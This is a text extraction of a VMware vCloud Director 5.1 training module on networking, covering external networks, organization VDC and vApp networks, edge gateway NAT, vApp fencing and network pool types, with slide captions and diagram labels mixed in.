Network engineers like stable networks that change very little:

This provides higher quality of service for customers.

Networks are easier to manage and maintain.

Network customers like dynamic networks:

We need a new network for a special research group. We want them tohave direct internet access.

We need a new network for Q&A. It needs the same IP addresses as theproduction network.

We need a new network to test marketing. It needs Internet access, but italso needs to be protected.

We need a new network to control production equipment on the factoryfloor. This custom production line must be online immediately. We want thefollowing IP addresses.

vCloud Director can provide dynamic networks to customers withoutdamaging the stability of corporate IT network systems.

From the viewpoint of the customers, the best solution is for customers to have the power to

instantly deploy their own networks. But customers do not have the knowledge or the expertise to

deploy and manage these networks.





3

From the viewpoint of the network engineers, the best solution is to have networks that never

change. But such networks do not meet the needs of the customers.

VMware vCloud® can provide dynamic network creation and deployment on a rapid basis to

customers without damaging the stability of corporate IT network systems.



The final layer is where the vCloud customers (organizations) operate. Customers can use the

organization VDC networks and network pools to create vApp networks and interconnect them.

They create and interconnect vApp networks rapidly and easily, without disrupting the physical

networks that all of these networking layers are built on With vCloud Director version 5 1





3

networks that all of these networking layers are built on. With vCloud Director version 5.1,

organization administrators can create and manage routed and isolated organization VDC networks.

With the advent of edge gateways, a system administrator can establish a wider boundary of

delegation to organization administrators without sacrificing critical communication boundaries.

External NetworksSlide 3-10




External networks are logical, differentiated networks based on vSphere port groups. These port

groups include distributed switch port groups, standard switch port groups, and Cisco N1000V port

groups. Each port group can become a single external network. The best practice is to use port

groups on distributed switches. A single distributed switch can have several port groups in it. Each

port group can provide a connection point for a different external network. If you plan to create

multiple external networks, the port groups should be separated by VLANs. The port groups must

be created in vCenter Server and must already exist before vCloud Director can use them for

external networks.

Even though this network is called an external network, a connection to the Internet is not required.

An external network is external to vCloud organizations. You can create an external network that isused to connect multiple ESXi hosts to other internal corporate resources without a route to the

Internet.

If you must provide vApps in the cloud with access to the Internet, create an external network that is

connected through a gateway router to the Internet.

Port groups in a VMware vSphere® Distributed Resource Scheduler™ or VMware vSphere® High

Availability cluster that is managed by vCloud Director do not have to be used for external

networks. Many of those networks are for purposes outside of vCloud Director. One example of a

External networks are used to provide a connection outside

the cloud, usually to the Internet.

External networks are built on vSphere port groups.

Organization VDC networks can connect to externalnetworks directly or through an edge gateway router.

External networks can be dedicated to a single organization orshared by multiple organizations.

Several external networks can co-exist on the samephysical LAN when separated by VLANs.

external network

organization A

edge gateway

organization B

edge gateway

Internet

network that is not used directly by vCloud Director would be a network that provides IP storage to

ESXi hosts. Another example would be a management network used for the internal administration

of ESXi hosts and vCenter Server systems.

E t l t k l b d t t i ti t th ith b f




V Mw ar ev C l o u d D

i r e c t or N e t w or k i n g

3

External networks can also be used to connect organizations together, either by use of a common

network that both organization edge gateways connect to, or an upstream router.

External Networks: Built on vSphere Port GroupsSlide 3-11




Visualizing how external networks at the provider level are built off vSphere networks is important.

Here you can see that external network, a provider-level external network, is built off a port group

named External. The External port group is located in the vDS-External distributed switch. The

ESXi01 and ESXi02 hosts are connected to the VDC production distributed switch.

The physical NICs on ESXi01 and ESXi02 are both labeled as vmnic1 on these two hosts. The

vmnic1 NIC on ESXi01 has been assigned an IP address of 172.20.11.51. The vmnic1 NIC on

ESXi02 has been assigned an IP address of 172.20.11.52. Both of these physical NICs are connected

to a physical network known as the production network. The production network has been assigned

a network Classless Inter-Domain Routing (CIDR) of 172.20.11.0/24.

External networks connect to port groups that have been defined on vSphere virtual switches. If you plan to use a vSphere port group for a vCloud external network, increase the number of ports from

the default value of 128 to 4096.

The best practice is to use only distributed switches. Distributed switches are automatically

consistent in names and port groups on all ESXi hosts in a cluster. vCloud Director can use them

with dynamic provisioning.

vCloud Director supports the Cisco Nexus v1000. However, the v1000 does not work with VLANor vCloud Director isolated network backed network pools. The v1000 requires network pools that

port group: External

external network

ESXi01 ESXi02

1 7 2 . 2

0 . 1

1 . 5

1

v m n i c 1

production network 172.20.11.0/24

v m n i c 1

1 7 2 . 2

0 . 1

1 . 5

2

distributed switch: vDS-External

Internet

are backed by port groups. The port groups must be preprovisioned. The best practice is to use

distributed switches with all network pools, including network pools that are backed by port groups

and used to support Cisco Nexus v1000 switches.

A standard switch can be used with vCloud Director external networks Standard switches are






3

A standard switch can be used with vCloud Director external networks. Standard switches are

supported, but not recommended. If you are using standard switches, then all the port groups have to be created accordingly on all the ESXi hosts in advance.

You can use standard switches with network pools that are backed by port groups, but doing so is

also not recommended.

Organization VDC NetworksSlide 3-12

external network Direct-connect network:




The types of organization VDC networks are:

• Direct-connect organization VDC networks: Created by the vCloud Director system

administrator and cannot be changed or managed by the organization administrator. A direct-connect organization VDC network is a literal extension of a specific external network.

• Routed organization VDC networks: Connect to an edge gateway device (router). The vCloud

Director system administrator must create each edge gateway. Only a vCloud Director system

administrator can manage external connections to the device. After an edge gateway has been

created for an organization, the organization administrator can create as many routed networks

as necessary, within the limitations of the edge gateway device that have been defined by the

vCloud Director administrator. An edge gateway can support 10 networks.

• Isolated organization VDC networks: Do not connect to an edge gateway and thus cannot

connect to an external network nor connect to other organization VDC networks. An isolated

network is managed through an Edge device that provides DHCP and static IP services to a

single internal network.

Organization users can attach routed vApp networks to each type of organization VDC network, or

direct-connect vApps to each type of network.

external network Direct connect network:

An extension of an external network

Cannot be created or managed by the

organization administrator

Routed networks:

Organization administrator can create

and manage multiple routed networks. Managed separately, represent an edge

gateway interface

Separate DHCP ranges and static IP

pools

Isolated networks:

Organization administrator can createand manage multiple isolated networks.

VMware® vShield Edge is deployed.

external network

edge gateway

network A

network B

network C

organization VDC network

vShield

Edge

network

Direct-Connect Organization VDC NetworkSlide 3-13

External NetworkSt ti IP P l A di t t t k i






3

Direct-connect organization VDC networks can be created and managed only by a vCloud Director

system administrator. An organization administrator has no control over the network characteristics

and network services for direct-connect organization VDC networks. Because a direct-connect

organization VDC network is a literal extension of an external network, many services are not

available, such as DHCP and firewall.

Direct-connect organization VDC networks use an external network to connect directly to the

Internet or to systems external to the cloud. For some single servers (such as small Web servers),

using an external type of network is the best solution because it does not need internal

communication. For administrative purposes, a customer can connect through SSH or remote

desktop directly to servers on this type of network.If a vApp is direct-connected, either the vApp IP addresses must be statically configured or a DHCP

server must be connected to the external network with IP addresses. If vApp addresses are statically

configured, they should use the same subnet that the external network is using. Direct connected

vApps should be fenced when connecting to external networks to prevent MAC or IP addresses

conflicts.

When the vCloud administrator creates a direct-connect organization VDC network, no visible

changes in the vSphere environment occur. External networks have already been created by the

This network can be created and managed only by a systemadministrator.

DHCP and firewall services are not available, only static IP pool.

Organization users can attach vApps and vApp networks.

vApp networks attach to a vShield Edge Gateway device, whichconsumes one IP address.

Direct-connect vApps can attach many virtual machines, which canconsume many IP addresses:

Fencing is recommended to avoid MAC and IP conflicts and to add firewallprotection.

e a e oStatic IP Pool

Only

A direct-connect network is a

literal extension of an external

network.Organization VDC Network

vCloud administrator. Networks that are direct-connected have no VMware® vShield Edge™

devices deployed to provide network address translation (NAT) or firewall services.

Direct-connect organization VDC networks depend on systems that are external to vCloud to

provide network support. These systems include systems such as DHCP and DNS. vApp




administrators can also manually configure the TCP/IP configuration of virtual machines, which areconnected (through vApp networks) to direct-connected organization VDC networks. The vApp

network might also be direct-connected. The vApp administrator must configure the virtual machine

network settings carefully to match the network configuration in use on the external network.

Directly connecting systems to the Internet without firewall protection is not recommended. You can

fence the vApp, which does provide firewall services.

vCloud administrators should also be aware that when multiple organization VDC networks are

direct-connected to the same external network, all network traffic on all of these networks is visible.

That visibility can violate the cloud principle of multitenancy.

Direct-connection networks must be used with extreme caution.

NOTE

The vCloud Director GUI refers to external networks at both the provider and organization level. To

prevent confusion, refer to an external network that is outside organizations as a provider externalnetwork. External networks that are inside organizations are either organization direct-connected

networks or organization external networks.

Isolated Organization VDC NetworksSlide 3-14

X






3

An organization administrator can create any number of isolated organization VDC networks. An

isolated organization VDC network is defined as a single subnet with an Edge device providing

services. The isolated network Edge device cannot be connected to an external network or to any

other organization VDC network.

If a customer does not want certain vApps to have a connection to the Internet, external networks, or

other organization VDC networks, using an isolated network is the best practice. The use of isolated

internal vApp networks is possible if the virtual machines require only internal communication with

each other. Examples of internal networks include networks for test systems and vApps that are used

only for high numbers of computations. Administration of virtual machines connected exclusively to

internal networks is possible only through a local console connection. Virtual machines can still

have multiple network interfaces. Having multiple interfaces enables a virtual machine to

communicate privately over a local-only internal network while also accessing the Internet or other

organization VDC network through a second interface.

An isolated network Edge device does not provide firewall or routing services. If virtual machines in

different vApps must communicate with each other, you must configure NAT features on each vApp

network Edge device to do the following:

An organization administrator can create and manage this type of

network. Organization users can attach vApps and vApp networks.

A vShield Edge device is deployed for DHCP and static IP poolservices.

Consumers

vApp networks

Virtual machines of direct-connect vApps

An isolated network does not consume an edge gateway interface.

DHCP,

Static IP

Pool

vShieldEdge

Network

XAn isolated network consists of avShield Edge device for DHCP and

other services and does not

connect to an external network.

• Obfuscate the internal vApp networks

• Define static routes on the vApp network Edge devices

• Direct-connect the vApps to the isolated network




When direct-connecting vApps, consider fencing the vApps to avoid MAC and IP address conflicts.

Routed Organization VDC NetworksSlide 3-15

Routed networks are attached toexternal network






3

Routed organization VDC networks connect to an edge gateway. An organization might be provided

with one or more edge gateways. Each edge gateway supports up to 10 network interfaces that are

shared among external and internal networks connected to the gateway. The organization

administrator can create routed networks, configure NAT features for each network (on the edge

gateway device), manage IP allocation pools and DHCP ranges, and configure firewall rules.

Each routed organization VDC network represents a managed interface on an edge gateway.

Services available to the routed networks attached to the same edge gateway are shared. If you

enable or disable a service, such as the DHCP service, that service is disabled for all attached

organization VDC networks. You can manage service state and configurations on a per-routed

network basis, but you are still managing the edge gateway itself.

Users can attached routed vApp networks or direct-connect vApps to a routed organization VDC

network.

Can be created and managed by an organization administrator

Each routed network allocates a network interface on the organizationedge gateway.

DHCP and static IP pool ranges are managed individually on eachorganization VDC network.

Services are shared. Enabling or disabling a service affects all

organization VDC networks. Organization users can attach vApps and vApp networks to each

organization VDC network.

an edge gateway router.DHCP,

static IP

pools

edge gateway

network A

network B

network C

Organization Edge GatewaysSlide 3-16

Organizations can have one or more edge gateways:




An edge gateway is a virtual router for organization VDC networks. You can configure an edge

gateway to provide network services such as DHCP, firewall, NAT, static routing, virtual private

network, and load balancing.

You can create an edge gateway in either a compact or a full configuration. The full configuration

provides increased capacity and performance. The compact configuration requires less memory and

fewer compute resources. All services are available in either configuration. You can enable either

configuration for high availability. A high availability edge gateway automatic failover of the edge

gateway to a backup instance that is running on a separate virtual machine.

An edge gateway can support up to 10 interfaces. These interfaces are categorized as uplinks when

they connect to an external network and categorized as internal interfaces when they connect to anorganization VDC network. You must specify at least one uplink interface when you create an edge

gateway. All uplink interfaces on an edge gateway must connect to an external network available in

the provider VDC that backs the organization VDC in which you are creating the edge gateway.

Internal interfaces are created automatically when you create a routed organization VDC network

that connects to an edge gateway.

Each organization typically has a least one edge gateway that connects to asingle external network and a single organization VDC network.

Multiple edge gateways can be used to provide separate service andmanagement points.

A single edge gateway can connect to multiple external networks andbe used to create many routed organization VDC networks.

The maximum number of interfaces on the edge gateway router is 10.

Edge gateways provide DHCP, static IP pool, firewall, NAT, rate limit,and load-balancing services.

Edge gateways connect an organization to the Internet and canconnect organizations.

Organizations can be connected by use of a common external network andstatic routes.

vApp NetworksSlide 3-17

Organization VDC NetworkDirect-connect network






3

A vApp network can be configured to provide many of the same kinds of services available to an

organization VDC network.

These types of connections can be defined for a vApp network:

• Direct-connect network. The virtual machines in a direct-connect vApp can be connected to a

selected organization VDC network.

• Routed network. The routed network type of connection is the most common vApp network

configuration when the virtual machines of a vApp must have Internet access or access to other

hosts attached to the network.

• Isolated network. An isolated vApp network does not connect to an organization VDC network.

An extension of an organization VDCnetwork

Virtual machines directly connected

Routed network

Typical IP router with NAT features

Connects a single vApp network with an


Isolated network

vShield Edge deployed

Does not connect to an organization

VDC network

Organization VDC Network

vShield Edge

vApp Network

vApp Network

vShield Edge

vApp Network

Direct-Connect vAppsSlide 3-18

A vShield Edge device is not deployed unless the vApp is fenced.




A vApp that you direct-connect does not have a network Edge device. The virtual machines are

directly connected to and consume the resources of an organization VDC network. When creating a

network that is direct-connected, you add one of the organization VDC networks as a vApp network.

Care must be taken when using direct-connect vApps. The virtual machines consume the

organization VDC network resources (such as static IP pool addresses). All network traffic for each

virtual machine is sent over the organization VDC network.

When direct-connecting vApps, consider fencing the vApp to avoid potential MAC and IP address

conflicts on the organization VDC network.

Services are consumed from the organization VDC network edgegateway.

Fencing is recommended.

DHCP,

Static IP

Pool

External Network

Edge Gateway

Network A

Network B

Network C



Multiconnection vAppsSlide 3-20

Always consider network security when designing vApp networking.

H A t k d thi A d fi ?




The vApp networking examples shown so far assume the same type of connection for each virtual

machine in the vApp. A vApp can be configured to have many local networks and connect to one or

more organization VDC networks simultaneously, with the vApp author deciding how each virtual

machine is connected.

The diagram shows how a single vApp can be configured with multiple networks. The vApp author

can configure the virtual machines with multiple network interfaces, then connect each virtual

machine network interface to any network added to the vApp.

How many vApp networks does this vApp define?

External Network

Edge Gateway

Network A

Network B

Network C

Network D

Answer: 4

Local network to network C

Local network - isolated

Direct connection to network B

Direct connection to network D

vApp Network RulesSlide 3-21

vApps cannot connect to the same vApp network.

Each vApp can have one or more vApp networks that connect to a common






3

Each vApp can have one or more vApp networks that connect to a commonorganization VDC network.

A vShield Edge device or vShield Edge Gateway device is deployed foreach vApp network:

The exception is direct-connect nonfenced vApps.

Each vShield Edge can be configured for IP translation NAT or port

forwarding NAT but not both. You cannot use IP translation for one virtual machine and port forwardingfor another virtual machine.



Lab 1: Configuring VMware vCloud Director NetworkingSlide 3-23

Configure vCloud Director networking






3

Review of Learner ObjectivesSlide 3-24

You should be able to meet the following objective:






Lesson 2: Network Address Translation and FencingSlide 3-25






3 Lesson 2:

Network Address Translation and Fencing



objectives: D ib NAT i id d b d t d th t k




j Describe NAT services provided by edge gateways and other network

devices used in vCloud Director

Describe the difference between a fenced vApp and a routed vApp

Suballocated IP PoolsSlide 3-27

External Network Pool: 172.20.10.100-199 172.20.10.0/24






3

For each external network, the vCloud Director system administrator may configure one or more

static IP pool ranges. The static IP pools are used by the edge gateways and virtual machines that

connect to that network.

The system administrator can suballocated a portion of the static IP pool on an external network to a

specific edge gateway for use in NAT operations. Suballocated ranges must be available to

configure destination NAT and source NAT rules on an edge gateway. Each suballocated pool is

reserved and is not used for normal IP allocations on the external network.

Suballocated IP pools are created and managed by a systemadministrator on specific edge gateway devices.

An organization administrator uses the suballocation range fordestination network address translation (DNAT) and source networkaddress translation (SNAT) mappings.

Organization A Organization B

Sub: 172.20.10.110-119 Sub: 172.20.10.120-129

Edge Gateway Destination NATSlide 3-28

DNAT

Associates an external IP address or IPedge gate a

external network 172.20.10.204




Destination network address translation (DNAT) rules translate a packet’s destination address and,

optionally, destination IP port to the values you specify.

In the most common case, you associate a NAT service with an uplink interface on an edge gatewayso that addresses on organization VDC networks are not exposed on the external network. You can

define NAT translations to associate IP addresses on separate organization VDC networks as well.

The internal address or addresses of the DNAT rules must be on directly attached networks, or be

identifiable through static routes.

A DNAT mapping defined on an edge gateway is unidirectional with state. Connections matching

the mapping specification are allowed through and the resulting solicited responses return using the

correct IP addresses and ports. Unsolicited outbound traffic is disallowed.Inbound packets destined for the external addresses of DNAT rules are delivered to the external

interface of the edge gateway. The gateway responds to Address Resolution Protocol (ARP) requests

for each DNAT-defined external address. After the packets are received, the edge gateway transforms

the destination IP address, updates the checksum, and translates the destination port if needed.

A DNAT mapping may be a single IP–to–single IP rule or an IP range–to–IP range rule. In the case

of an IP range, a 1:1 correlation exists between each IP pair from first to last. Protocol filtering can

be defined for each DNAT rule.

range with an internal IP address or IPrange, on a 1:1 basis

Solicited responses return through themapping.

Unsolicited outbound traffic does not

traverse the mapping.

edge gateway

192.168.100.170

vApp

organization VDC

network


00:50:56:01:00:2b

172.20.10.100

IP: 172.20.10.204

IP: 192.168.100.170

ARP - 172.20.10.204 is at:00:50:56:01:00:2b

external network

DNAT

172.20.10.204 192.168.100.170

ARP - Who has:

172.20.10.204

Edge Gateway Source NATSlide 3-29

SNAT

Associates an internal IP address or IPrange with an external IP address or IPd t

external network 172.20.10.204





3

Source network address translation (SNAT) translates the packet’s source address and, optionally,

the source port to the values you specify.

Source NAT is the reverse of destination NAT. Traffic leaving a specific IP address or IP range istransformed as originating from a different IP address or IP range on an external network connected

to the edge gateway. In the case of IP ranges, a 1:1 correlation exists between each sequential IP

pair.

An SNAT mapping is unidirectional with state. Connections matching the mapping specification are

allowed through and the resulting solicited responses return using the correct IP addresses and ports.

Unsolicited inbound traffic is disallowed.

As with DNAT, the gateway responds to ARP requests for each SNAT-defined external address.After the packets are received, the edge gateway transforms the destination IP address, updates

checksums, and translates the destination port if needed.

Source NAT rules may be defined to target IP addresses on any network connected to the edge

gateway. The external addresses of SNAT rules must be in the range of a directly attached subnet.

The source address can be from a directly attached subnet or from a source that is routed to the

gateway. If the source addresses are routed, the gateway must have the appropriate static routes

defined for handling the response traffic.

grange, on a 1:1 basis.

Solicited responses return through themapping.

Unsolicited inbound traffic does nottraverse the mapping.

edge gateway

192.168.100.170vApp

organization VDC

network


00:50:56:01:00:2b

172.20.10.100

IP: 172.20.10.204

IP: 192.168.100.170

ARP - Who has:

172.20.10.204

ARP - 172.20.10.204 is at:00:50:56:01:00:2b

external network

SNAT

192.168.100.170 172.20.10.204

Routed vApps: IP TranslationSlide 3-30

IP translation associates anexternal IP address with a virtualmachine IP address on a 1:1b i

172.30.15.205Organization VDC Network




Unlike an edge gateway that implements DNAT and SNAT rules, a vApp network Edge device can

implement 1:1 IP translation, port forwarding, and IP masquerading.

IP translation is a true 1:1 bidirectional mapping of a virtual machine network interface with anexternal address. IP translation is similar to edge gateway destination NAT, except that IP translation

is a full bidirectional mapping without protocol filtering. In terms of traffic, the specified virtual

machine interface and the external IP address are synonymous.

When IP translation is enabled, all traffic not matching a rule is still routed through the Edge device,

exposing vApp IP addresses to upstream networks. Configure firewall rules to block this behavior.

You can use IP masquerading to isolate the vApp network behind a many-to-one NAT configuration.

But because IP masquerading and IP translation features are mutually exclusive, you cannot use both in the same service configuration.

As with most NAT operations, the Edge device responds to ARP requests for all IP translation

external addresses.

basis.

Bidirectional mapping

All traffic is passed.

Configure firewall rules for protocolfiltering.

192.168.100.104 192.168.100.170

192.168.100.0/24

IP Translation

192.168.100.170 172.30.15.205

vApp Network

00:50:56:01:00:2c

vShield Edge

IP: 172.30.15.205

IP: 192.168.100.170

ARP - Who has:

172.30.15.205

ARP - 172.30.15.205 is at:

00:50:56:01:00:2c


Routed vApps: Port ForwardingSlide 3-31

Port forwarding associates aTCP/UDP port with a virtualmachine IP address and port.

Organization VDC NetworkTCP:8080

TCP:80





3

Port forwarding provides external access to services running on virtual machines on the vApp

network. Traffic matching a specified transport protocol that has been directed to the external

interface of the Edge device is forwarded to the rule-specified virtual machine interface. The

inbound port can be changed based on the forwarding rule configuration.

Response traffic from the virtual machine is transformed on the outbound to appear as originating

from the external interface of the edge.

After port forwarding has been enabled, IP masquerading can be selected. If IP masquerading is not

enabled, the edge device routes subnet traffic, exposing vApp virtual machine addresses to upstream

networks.

Port forwarding NAT is mutually exclusive to IP translation. You cannot have both NAT servicesconfigured at the same time. Switching between the two types of NAT erases all existing rules.

Packets received on the vShieldEdge external interface areforwarded and translated basedon the rules.

vApp Network

vShield Edge:

172.30.15.5

IP: 192.168.100.170


Port Forwarding

TCP: 8080 192.168.100.170:80

Dest: 172.30.15.5

Proto: TCP:8080

Dest: 192.168.100.170

Proto: TCP:80

192.168.100.104 192.168.100.170

192.168.100.0/24

TCP:80

Routed vApps: IP MasqueradingSlide 3-32

Many-to-one NAT

Also called port address translation (PAT ) and NAT overload Outbound packets from the vApp are translated to appear upstream as




IP masquerading enables a typical port address translation configuration on the vApp network Edge.

All outbound traffic is transformed as originating from the external interface of the vApp network

Edge.

To enable IP masquerading, you must first enable NAT and set the NAT type to port forwarding.

Because IP masquerading depends on a NAT type of port forwarding, IP masquerading cannot be

used with IP translation.

For many vApp configurations, the use of IP masquerading might be preferred as it isolates the

vApp network for duplication.

p pp pp poriginating from the vShield Edge external interface.

Source TCP/UDP ports are changed as needed.

NAT must be enabled with the type set to Port Forwarding.

192.168.100.104 192.168.100.170

192.168.100.0/24


Source IP: vShield Edge External IP

TCP Source Port: 32785

TCP Source Port: 61789

vApp Fencing (1)Slide 3-33

Fencing isolates virtual machines by segmenting the layer 2 broadcastdomain, removing the possibility of inter-vApp MAC and IP addressconflicts.

O l A th t di t t t i ti VDC t k b





3

You can choose to fence a vApp when the vApp has been configured with one or more direct

connections to organization VDC networks. A direct-connect network is a literal reference to an

organization VDC network. Directly connecting virtual machines can lead to MAC and IP address

conflicts when other direct-connect vApps are deployed in the same manner. For direct-connectcases, fencing of the vApp should be considered. Only vApps that direct-connect to an organization

VDC network can be fenced. A network Edge device is not deployed for direct-connect vApp

networks unless the vApp if fenced.

Fencing the vApp causes a network Edge device to be deployed that separates the vApp virtual

machines from the organization network. The Edge device has two interfaces: One interface is

attached to the organization network and the other connects to the vApp. The vApp network has the

same subnet address as the organization network with the fencing Edge device separating the broadcast domains. The fencing Edge device is deployed with IP translation rules associating vApp

virtual machine addresses with addresses allocated from the organization VDC network.

Only vApps that direct-connect to an organization VDC network can befenced.

A vShield Edge device is deployed with IP translation rules mappingeach virtual machine in the vApp to an IP address on the organizationVDC network.

The fence provides firewall and NAT options.

You can change the NAT type.

vApp Fencing (2)Slide 3-34

How many subnets are defined?

How many layer 2 broadcast domains?

A fencing vShield Edge

device does not definea new subnet. It




The diagram illustrates how fencing works. Each of the two vApps contains two virtual machines

configured to direct-connect to a common organization VDC network. Because the vApp virtual

machines have the same set of IP addresses, IP conflicts occur on the organization VDC network

broadcast domain unless fencing is configured.

For each vApp, an edge device is deployed that isolates the virtual machines into a separate layer-2

broadcast domain. The edge devices are deployed with preconfigured IP translation rules based on

which virtual machines in the vApp are connecting to the attached organization VDC network.

Edge Gateway

vShield

Edge

Organization VDC Network172.30.15.0/24

172.30.15.104 172.30.15.105

172.30.15.0/24

172.30.15.207 172.30.15.208

172.30.15.104 172.30.15.105

172.30.15.0/24

172.30.15.209 172.30.15.210

vShield

Edge

segments the layer 2

broadcast domain.

Multiple Fence ConfigurationSlide 3-35

Fencing a vApp fences all direct-connect networks (all or none).

One fence is deployed for each direct-connect network. How many subnets are defined in the diagram?





3

The diagram shows a vApp of two virtual machines configured to connect to two different

organization VDC networks. When fencing is enabled, a separate edge device is deployed for each

direct-connect organization VDC network. The edge devices each have a unique set of IP translation

rules based on how the virtual machines in the vApp connect to the organization VDC networks.

How many layer 2 broadcast domains?

edge gateway

organization VDC network A172.30.15.0/24

172.30.15.104 172.30.27.204

172.30.15.0/24

172.30.15.207

organization VDC network B

172.30.27.0/24

172.30.27.0/24

172.30.27.52

Answer:

2 subnets

4 layer 2 broadcast domains



Describe NAT services provided by edge gateways and other networkdevices used in vCloud Director




Describe the difference between a fenced vApp and a routed vApp





objectives:

Define a network pool

D ib th t f t k l




What is a network pool? A network pool is a predefined collection of vSphere network resources

that can be used by vCloud Director to dynamically create a limited number of organization and

vApp networks. Think of a network pool as a collection as a set of templates to help you create

networks. The resources include things like VLAN IDs, port groups, virtual network switches, andvCloud Director isolated networks.

Describe the types of network pools

About Network PoolsSlide 3-39

A network pool is a predefined collection of vSphere network resourcesthat can be used by vCloud Director to dynamically create a limitednumber of organization and vApp networks.

All but direct-connect organization virtual data center networks require





3

Network pools are used as a template to create networks at the organization and vApp levels.

Two types of organization VDC networks require network pools. These networks are routed

organization VDC networks that connect to an external network through an edge gateway and

isolated organization VDC networks.

All vApp networks are built off network pools. Although a direct-connect vApp does not consume

network pool resources, fencing the vApp requires a network.

When you create a network pool, you must specify a maximum limit of networks. This maximum

limits the maximum number of networks that can be created from the pool.

network pool resources.

All but direct-connect, nonfenced vApp networks require network poolresources.

If a network pool runs out of network resources, vCloud Director cannot

create new networks based on this pool. Networks can be deleted to return resources to the network pool.

Network pools and organization quotas can be expanded.

Resources include ranges of VLAN IDs, port groups, virtual networkswitches, and vCloud Director isolated networks.

Network PoolsSlide 3-40




A provider VDC gets its resources from vSphere. CPU and memory are combined into a resource

pool. Storage is configured into datastores. All of these resources are used by vCloud Director to

create a provider VDC. Networks are not included in resource pools or datastores. When you create

a provider VDC, vCloud Director analyzes the underlying ESXi hosts and clusters that the resourcescome from. Based on that analysis, vCloud Director reports to you which external networks are

available to organizations and vApps that are built on a provider VDC.

Organizations and vApps get their resources from an organization VDC, which is built on the

provider VDC. When you create an organization VDC, vCloud Director enables you to associate the

organization VDC directly with a network pool. The network pools are built on vSphere port groups,

virtual switches, VLANs, and vCloud Director isolated networks.

(Provider) external networks are defined as being available to a provider VDC. Network pools are

directly associated with specific organization VDCs.

Used as a template to create new vCloud Director networks

Organization VDC networks:

Routed organization VDC networks Isolated organization VDC networks

vApp networks:

All nonfenced vApp networks

Each pool contains a maximum limit on the number of networks thatcan be created from it.

Network pools might become overcommitted, so VMware® recommendsmonitoring of network pool utilization.

Organizations, Network Pools, and Organization VDCs (1)Slide 3-41

Organization VDCs are assigned a network pool.

Each organization VDC can be assigned only one network pool.

A single network pool can be used by multiple organization VDCs, with the

system administrator defining the quota for each organization VDC.





3

Each cloud can have multiple organizations. Each organization can have its own organization

VDCs. A single organization can have multiple VDCs. Multiple VDCs can connect to the same

network pool A single organization VDC cannot connect to multiple network pools.

Each network pool must be backed by a network resource in vSphere. The network resource has to

be in the vSphere cluster that the cloud is built on. Network resources include VLANs, preexisting

port groups, and vCloud Director isolated networks.

y g q g

A single organization can have multiple organization VDCs and connect to

multiple network pools.

organization

Network Pool

VDC VDC

Network PoolNetwork Pool

VDC

VDC



Network Pool BackingSlide 3-43

Each network pool must be backed by a network resource.

Four types of network pools are possible: VLAN-backed

vCloud Director isolated network-backed





3

Port group-backed

VXLAN-backed

NetworkPool VCD-NI 10

Network Pools Backed by VLANsSlide 3-44

New networks are created usingVLANs.

VLAN ranges are configured in thenetwork pool.

N t k l t il bl




The most common type of Network pool is a Network pool that is built on VLANs. For a VLAN

type of network pool, you must specify a VLAN ID range or a group of VLAN ID ranges. When

you specify VLAN ID ranges, do not overlap existing VLANs either in vCenter Server or in

attached physical switches.

Exercise care when you configure your physical switches. When you put a port into trunk mode,

verify that the VLANs you have configured on your ESXi host are defined and allowed by the

switch trunk port. The default behavior varies among different types of switches and between

vendors. You might need to define all the VLANs used with ESXi explicitly on the physical switch.

For each VLAN definition, you can specify the VLAN ID, name, type, maximum transmission unit

(MTU), security association identifier (SAID), state, ring number, bridge identification number, and

so on.

For switches that allow all ports by default, you might not need to do anything. The VMware® best

practice is to restrict the VLAN ranges to only those VLAN IDs that you need.

vSphere VXLAN networks are based on the IETF draft VXLAN standard. These networks support

local-domain isolation equivalent to what is supported by vSphere isolation-backed networks.

New networks select an availableVLAN ID.

VMware® vCenter Serverconfigures a new port group with the

selected VLAN ID.

The number of networks is limited bythe number of VLAN IDs in the pool.

Port groups are created automaticallyby vCenter Server.

VLAN IDs should also be configured

on an uplink physical switch (trunkmode).

Network Pools Backed by a vCloud Director Isolated NetworkSlide 3-45

Networks are created with the use of tunneling (encapsulation).

Traffic moves between ESXi hosts on network layer 2 by using MAC-in-MAC encapsulation.

vCenter Server creates the required port groups as needed.





3

The second type of network pool is one backed by vCloud Director isolated network. The vCloud

Director isolated network is driven by the VSLAD agent that runs on ESXi hosts in the vSphere

DRS/vSphere HA cluster. The VSLAD agent is part of the software in the VSLA kernel module.

vCloud Director isolated networks isolate network traffic. If a packet needs to leave the port group

on one ESXi host to move to a different ESXi host, it is tunnelled through the VMkernel module.

This tunneling uses MAC-in-MAC encapsulation, which puts a vCloud Director isolated network

header in place and sends the packet out to the physical layer. A vCloud Director isolated network

adds 24 bytes to the length of the packet.

Think of the vCloud Director isolated network as a software-based isolated network between two or

more ESXi hosts which is using special packets at layer 2 of the network model (Ethernet layer).

The packets are decoded in the VMkernel. Network traffic is isolated at layer 2. vCloud Director

isolated networks can be used to connect traffic on multiple ESXi hosts.

Creating a network pool that is backed by the vCloud Director isolated network does not change

anything on the vSphere layer. You will not see a vShield Edge device deployed. No new port

groups appear. When a vApp that connects to a network is powered on, the vShield Edge device is

deployed and the port group is created.

Requirements:

A distributed switch that is connected to all VMware® ESX®/ESXi hosts.

VMkernel VMkernel

ESXi host ESXi host

vCloud Director isolated

network tunnel

Network Pools Backed by Port GroupsSlide 3-46

New networks are created by using existing port groups.

Port groups must be created in advance by the vCenter Serveradministrator.

Port groups must be configured with VLAN IDs to meet vCloud securityrequirements




The final type of network pool backing is a network pool backed by vSphere port groups. The port

groups on virtual switches must be created in advance by the VMware® vCenter™ administrator.

These port groups must already have VLAN IDs configured to meet vCloud security requirements.

The network pool based on port groups is the least flexible type of network pool. However, this typeof network pool backing does give the vCloud administrator total control over the configuration.

You can override the VLAN configuration requirement. VMware recommends against overriding

the VLAN configuration requirement.

requirements.

The assignment of the vSphere port group to the network pool is static.

vCloud Director can create one network for each port group that is

assigned to the network pool. Port groups can be on distributed switches or standard switches.

The VMware best practice is to use only distributed switches.

Network Pools Backed by VXLAN (1)Slide 3-47

Virtual extensible LAN.

Based on the IETF draft VXLAN standard.

A MAC-in-IP encapsulation designed to replace vCloud DirectorIsolated Networks. (Wraps layer 2 in layer 3.)

Add 24 bit VXLAN t k id tifi t th k t





3

VXLANs is a new type of LAN connection that is designed to replace the vCloud Director Isolated

Networks.

Adds a 24-bit VXLAN network identifier to the packet.

VXLAN networks support local-domain isolation equivalent to what issupported by vSphere isolation-backed networks.

When you create a provider VDC, a VXLAN network pool is created invCloud Director.

When you use this network pool, VXLAN virtual wires are created invCenter Server.


VLAN ID = 01 VLAN ID = 02

Router




